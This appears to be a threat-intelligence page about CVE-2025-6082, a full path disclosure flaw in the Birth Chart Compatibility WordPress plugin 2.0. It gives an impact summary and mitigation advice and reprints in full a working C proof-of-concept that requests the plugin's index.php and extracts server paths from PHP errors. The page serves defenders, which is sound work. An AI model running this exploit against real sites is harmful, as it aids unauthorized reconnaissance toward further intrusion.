Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
AI Analysis
Technical Summary
The Birth Chart Compatibility WordPress Plugin version 2.0 contains a full path disclosure vulnerability that exposes the absolute file system path of the web server to unauthenticated attackers. This type of vulnerability typically arises from improper error handling or debug information leakage, where the plugin outputs or reveals the full server path in error messages or responses. Attackers can leverage this information to map the server's directory structure, identify the location of critical files, and facilitate further attacks such as local file inclusion (LFI), remote code execution (RCE), or privilege escalation. The exploit code available on Exploit-DB is written in C, suggesting that the exploit can be compiled and run on various platforms to automate the attack process. Although no active exploitation has been reported, the availability of exploit code lowers the barrier for attackers. The vulnerability affects WordPress sites using this specific plugin version, which may be installed on numerous websites globally. Since the vulnerability does not require authentication or user interaction, it can be exploited remotely by any attacker scanning for vulnerable sites. The lack of patch links indicates that no official fix has been released yet, emphasizing the need for immediate mitigation steps by site administrators.
Potential Impact
For European organizations, this vulnerability can lead to the exposure of sensitive server path information, which can be leveraged by attackers to conduct more targeted and effective attacks against web infrastructure. While the vulnerability itself does not directly compromise confidentiality or availability, it significantly aids attackers in reconnaissance and subsequent exploitation attempts. Organizations handling sensitive data or critical services via WordPress sites are at increased risk, as attackers may use the disclosed information to identify and exploit other vulnerabilities. This can lead to data breaches, defacement, or service disruptions. The impact is particularly relevant for sectors with high online presence such as e-commerce, media, and public services. Additionally, organizations in Europe must consider compliance with GDPR, as any resulting data breach from chained exploits could lead to regulatory penalties.
Mitigation Recommendations
European organizations should immediately audit their WordPress installations to identify the presence of the Birth Chart Compatibility Plugin version 2.0. If found, they should remove or disable the plugin until a patch is available. Restricting access to error messages and sensitive files via web server configuration (e.g., disabling detailed error reporting in production environments) can reduce information leakage. Implementing Web Application Firewalls (WAFs) with rules to detect and block attempts to exploit path disclosure vulnerabilities can provide an additional layer of defense. Regularly monitoring web server logs for unusual requests or error patterns can help detect exploitation attempts early. Organizations should also ensure that WordPress core and all plugins are kept up to date and consider using security plugins that limit information disclosure. Finally, conducting security awareness training for web administrators about the risks of verbose error messages and insecure plugin usage is recommended.
Affected Countries
Germany, United Kingdom, France, Italy, Spain, Netherlands, Poland, Sweden
Indicators of Compromise
- exploit-code: /* * Exploit Title : Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure * Author : Byte Reaper * Telegram : @ByteReaper0 * CVE : CVE-2025-6082 * Software Link : https://frp.wordpress.org/plugins/birth-chart-compatibility/ * Description : Proof‑of‑Concept exploits the Full Path Disclosure bug in the * “Birth Chart Compatibility” WordPress plugin (<=v2.0). It sends * an HTTP GET request to the plugin’s index.php endpoint, captures * the resulting PHP warning or fatal error, and parses the server’s * filesystem path (e.g. “/var/www/html/wp-content/plugins/…” or * “C:\\xampp\\htdocs\\…”). Revealing this path aids attackers in * chaining further LFI/RCE or reconnaissance attacks. */ #include<stdio.h> #include"argparse.h" #include<string.h> #include <stdlib.h> #include <curl/curl.h> #include <unistd.h> #define FULL 2300 const char *url = NULL; const char *cookies=NULL; int selecetCookie = 0; int verbose = 0; void exitSyscall() { __asm__ volatile ( "xor %%rdi, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "syscall\n\t" : : :"rax", "rdi" ); } const char *keyFound[] = { "Warning:", "Fatal error:", "/var/www/", "C:\\xampp\\" }; struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n"); exitSyscall(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } void showPath(const char *targetUrl) { char full[FULL]; CURLcode curlCode; struct Mem response = {NULL, 0}; CURL *curl = curl_easy_init(); if (curl == NULL) { exitSyscall(); } response.buffer = NULL; response.len = 0; if (verbose) { printf("==========================================\e[0m\n"); printf("[+] Cleaning Response...\e[0m\n"); printf("[+] Response Buffer : %s\e[0m\n", response.buffer); printf("[+] Response Len : %zu\e[0m\n", response.len); printf("==========================================\e[0m\n"); } fflush(stdout); if (curl) { snprintf(full, sizeof(full), "%s/wp-content/plugins/birth-chart-compatibility/index.php", targetUrl); curl_easy_setopt(curl, CURLOPT_URL, full); if (selecetCookie) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_ACCEPT_ENCODING, ""); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); sleep(1); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); if (verbose) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } struct curl_slist *h = NULL; h = curl_slist_append(h, "Accept: text/html"); h = curl_slist_append(h, "Accept-Encoding: gzip"); h = curl_slist_append(h, "Accept-Language: en-US,en"); h = curl_slist_append(h, "Connection: keep-alive"); h = curl_slist_append(h, "Referer: http://example.com"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h); long httpCode = 0; curlCode = curl_easy_perform(curl); if (curlCode == CURLE_OK) { printf("---------------------------------------------------------------------------------------\n"); printf("\e[1;36m[+] Request sent successfully\e[0m\n"); printf("\e[1;33m[+] Input Url : %s\e[0m\n", targetUrl); printf("\e[1;33m[+] Full Format Url : %s\e[0m\n",full); curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode); int numberKey = sizeof(keyFound) / sizeof(keyFound[0]); if (httpCode >= 200 && httpCode < 300) { printf("[+] Http Code (200 < 300) !\e[0m\n"); printf("\e[1;32m[+] Http Code : %ld\e[0m\n", httpCode); printf("\e[1;35m====================================[Response]====================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len); printf("\e[1;35m===================================================================================\e[0m\n\n"); for (int k = 0; k < numberKey; k++) { const char *found = strstr(response.buffer, keyFound[k]); if (found) { printf("\e[1;34m[+] Keyword found: %s\e[0m\n", keyFound[k]); printf("\e[1;34m[+] Context: %.100s\e[0m\n", found); } } } else { printf("\e[1;31m[-] Http Code : %ld\e[0m\n", httpCode); printf("\e[1;31m[-] Please Check Your input Path !\e[0m\n"); printf("\e[1;31m[-] Or Connection in Tragte : (%s)\e[0m\n", targetUrl); if (verbose) { printf("\e[1;35m====================================[Response]====================================\n"); printf("%s\n", response.buffer); printf("\e[1;32m[+] Response Len : %zu\e[0m\n", response.len); printf("\e[1;35m===================================================================================\n\n"); } } } else { printf("\e[1;31m[-] The request was not sent !\e[0m\n"); if (verbose) { printf("\e[1;31m[-] Exit Syscall ...\e[0m\n"); } printf("\e[1;31m[-] Error : %s\n", curl_easy_strerror(curlCode)); exitSyscall(); } } if (response.buffer) { free(response.buffer); response.buffer = NULL; response.len = 0; } curl_easy_cleanup(curl); } int main(int argc, const char **argv) { printf ( "\e[1;91m" "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▄▖▄▖▄▖ \n" "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▖▛▌▙▌▄▌ \n" "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▙▌█▌▙▌▙▖ \n" "\e[1;97m\t Byte Reaper\e[0m\n" ); printf("\e[1;91m---------------------------------------------------------------------------------------\e[0m\n"); int loop = 0; struct argparse_option options[] = { OPT_HELP(), OPT_STRING('u', "url", &url, "Target Url (Base Url)"), OPT_STRING('c', "cookies", &cookies, "cookies File"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_INTEGER('f', "loop", &loop, "For loop (Request) (Ex : -f 10)"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (!url) { printf("\e[1;31m[-] Please Enter Target Url !\e[0m\n"); printf("\e[1;31m[-] Ex : ./exploit -u https://target.com\e[0m\n"); exitSyscall(); } if (verbose) { verbose=1; } if (cookies) { selecetCookie = 1; } if (loop) { for (int o = 0; o < loop ; o++) { showPath(url); } } showPath(url); return 0; }
Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
Description
Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
AI-Powered Analysis
Technical Analysis
The Birth Chart Compatibility WordPress Plugin version 2.0 contains a full path disclosure vulnerability that exposes the absolute file system path of the web server to unauthenticated attackers. This type of vulnerability typically arises from improper error handling or debug information leakage, where the plugin outputs or reveals the full server path in error messages or responses. Attackers can leverage this information to map the server's directory structure, identify the location of critical files, and facilitate further attacks such as local file inclusion (LFI), remote code execution (RCE), or privilege escalation. The exploit code available on Exploit-DB is written in C, suggesting that the exploit can be compiled and run on various platforms to automate the attack process. Although no active exploitation has been reported, the availability of exploit code lowers the barrier for attackers. The vulnerability affects WordPress sites using this specific plugin version, which may be installed on numerous websites globally. Since the vulnerability does not require authentication or user interaction, it can be exploited remotely by any attacker scanning for vulnerable sites. The lack of patch links indicates that no official fix has been released yet, emphasizing the need for immediate mitigation steps by site administrators.
Potential Impact
For European organizations, this vulnerability can lead to the exposure of sensitive server path information, which can be leveraged by attackers to conduct more targeted and effective attacks against web infrastructure. While the vulnerability itself does not directly compromise confidentiality or availability, it significantly aids attackers in reconnaissance and subsequent exploitation attempts. Organizations handling sensitive data or critical services via WordPress sites are at increased risk, as attackers may use the disclosed information to identify and exploit other vulnerabilities. This can lead to data breaches, defacement, or service disruptions. The impact is particularly relevant for sectors with high online presence such as e-commerce, media, and public services. Additionally, organizations in Europe must consider compliance with GDPR, as any resulting data breach from chained exploits could lead to regulatory penalties.
Mitigation Recommendations
European organizations should immediately audit their WordPress installations to identify the presence of the Birth Chart Compatibility Plugin version 2.0. If found, they should remove or disable the plugin until a patch is available. Restricting access to error messages and sensitive files via web server configuration (e.g., disabling detailed error reporting in production environments) can reduce information leakage. Implementing Web Application Firewalls (WAFs) with rules to detect and block attempts to exploit path disclosure vulnerabilities can provide an additional layer of defense. Regularly monitoring web server logs for unusual requests or error patterns can help detect exploitation attempts early. Organizations should also ensure that WordPress core and all plugins are kept up to date and consider using security plugins that limit information disclosure. Finally, conducting security awareness training for web administrators about the risks of verbose error messages and insecure plugin usage is recommended.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52419
- Has Exploit Code
- true
- Code Language
- c
Indicators of Compromise
Exploit Source Code
Exploit code for Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
/* * Exploit Title : Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure * Author : Byte Reaper * Telegram : @ByteReaper0 * CVE : CVE-2025-6082 * Software Link : https://frp.wordpress.org/plugins/birth-chart-compatibility/ * Description : Proof‑of‑Concept exploits the Full Path Disclosure bug in the * “Birth Chart Compatibility” WordPress plugin (<=v2.0). It sends * an HTTP GET request to the plugin’s index.php endpoint,... (8722 more characters)
Threat ID: 68ae5e7aad5a09ad005d88ca
Added to database: 8/27/2025, 1:25:14 AM
Last enriched: 11/18/2025, 9:19:13 AM
Last updated: 12/4/2025, 3:34:01 AM
Views: 132
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Related Threats
Microsoft Silently Patches Windows LNK Flaw After Years of Active Exploitation
HighAttempts to Bypass CDNs, (Wed, Dec 3rd)
MediumDjango 5.1.13 - SQL Injection
MediumMaNGOSWebV4 4.0.6 - Reflected XSS
MediumphpMyFAQ 2.9.8 - Cross-Site Request Forgery (CSRF)
MediumActions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.